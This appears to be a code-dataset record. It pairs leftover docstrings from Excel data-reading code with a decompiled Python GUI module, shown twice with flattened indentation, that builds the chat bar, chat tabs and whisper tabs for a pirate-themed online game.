is. size: The size of the 2nd dimension of the data. Returns ------- series, data: ndarray (1D), ndarray(1D/2D) The values of the series and data. # Horizontal data (dimension values in a row) # get the dimension values # read data # Vertical data (dimension values in a column) # get the dimension values # read data # get series data # horizontal definition of lookup/time dimension # vertical definition of lookup/time dimension # Error if the lookup/time dimension is 2D # get data # transpose for horizontal definition of dimension # Given coordinates length is different than # the lentgh of 2nd dimension # remove second dimension of data if its shape is (N, 1) # raise FileNotFoundError(self.file) # python2 compatibility Initialize one element of DATA or LOOKUPS Parameters ---------- element_type: str "lookup" for LOOKUPS, "data" for data. Returns ------- data: xarray.DataArray Dataarray with the time or interpolation dimension as first dimension. 
# remove nan or missing values from dimension # Remove last nans only if the method is to read by row or col # series has len 0 # warning/error if missing data in the series # Check if the lookup/time dimension is strictly monotonous # Check for missing values in data # Fill missing values with the chosen interpolation method # what Vensim does during running for DATA # fill values Fills missing values in excel read data. Mutates the values in data. Parameters ---------- series: the time series without missing values data: the data with missing values Returns ------- None # if data is 2dims we need to interpolate Interpolates a list of missing values from _fill_missing Parameters ---------- x: list of missing values interpolate xr: non-missing x values yr: non-missing y values Returns ------- y: Result after interpolating x with self.interp method Returns file and sheet name in a string Transforms the column name to int Parameters ---------- col: str Column name Returns ------- int Column number Splits a cell value given in a string. Returns None for non-valid cell formats. Parameters ---------- cell: str Cell like string, such as "A1", "b16", "AC19"... If it is not a cell like string will return None. Returns ------- row number, column number: int, int If the cell input is valid. Both numbers are given in Python enumeration, i.e., first row and first column are 0. # check that we only have two values [column, row] # check that the column name has no special characters # check that row number is not 0 # the column name has as maximum 3 letters Reshapes an pandas.DataFrame, pandas.Series, xarray.DataArray or np.ndarray in the given dimensions. Parameters ---------- data: xarray.DataArray/numpy.ndarray Data to be reshaped dims: tuple The dimensions to reshape. Returns ------- numpy.ndarray reshaped array Selects if a series data (DATA/LOOKUPS), should be read by columns, rows or cellrange name. Based on the input format of x_row_or_col and cell. The format of the 2 variables must be consistent. Parameters ---------- x_row_or_col: str String of a number if series is given in a row, letter if series is given in a column or name if the series is given by cellrange name. cell: str Cell identificator, such as "A1", or name if the data is given by cellrange name. 
Returns ------- series_across: str "row" if series is given in a row "column" if series is given in a column "name" if series and data are given by range name # if x_row_or_col is numeric the series must be a row # if the cell can be splitted means that the format is # "A1" like then the series must be a column Class for Vensim GET XLS DATA/GET DIRECT DATA # check if the interpolation method is valid Add information to retrieve new dimension in an already declared object Initialize all elements and create the self.data xarray.DataArray # Remove time coord from the DataArray # if data has no-coords return a float Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS Add information to retrieve new dimension in an already declared object Initialize all elements and create the self.data xarray.DataArray # shape 0 xarrays # the output will be always an xarray # the output could be a float or an xarray # Remove lookup dimension coord from the DataArray # if lookup has no-coords return a float Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS Add information to retrieve new dimension in an already declared object Initialize all elements and create the self.data xarray.DataArray Initialize one element # nan values in data # Create only an xarray if the data is not 0 dimensional Function thar reads data from excel file for CONSTANT Parameters ---------- data_across: "cell" or "name" The way to read data file. cell: int or str If data_across is "cell" the lefttop split cell value where the data is. If data_across is "name" the cell range name where the data is. shape: The shape of the data in 2D. Returns ------- data: float/ndarray(1D/2D) The values of the data. # read data from topleft cell name using pandas # read data from cell range name using OpenPyXL # Remove length=1 axis # Data is a float, nothing to do # Check data dims Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT | 3.314808 | 3 |
pirates/piratesgui/ChatBar.py | ksmit799/POTCO-PS | 8 | 9171 | # File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
        TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
        return ChatTab(self, name, **kw)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
        TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
        newWhisperTab = WhisperTab(self, name, **kw)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
        DirectFrame.__init__(self, parent, *args, **kw)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
        allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = ['All'])
        crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = ['Crew'])
        guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = ['Guild'])
        shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = ['ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = '<NAME>', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| # File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
        TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
        return ChatTab(self, name, **kw)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
        TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
        newWhisperTab = WhisperTab(self, name, **kw)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
        DirectFrame.__init__(self, parent, *args, **kw)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
        allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = ['All'])
        crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = ['Crew'])
        guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = ['Guild'])
        shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = ['ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = '<NAME>', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
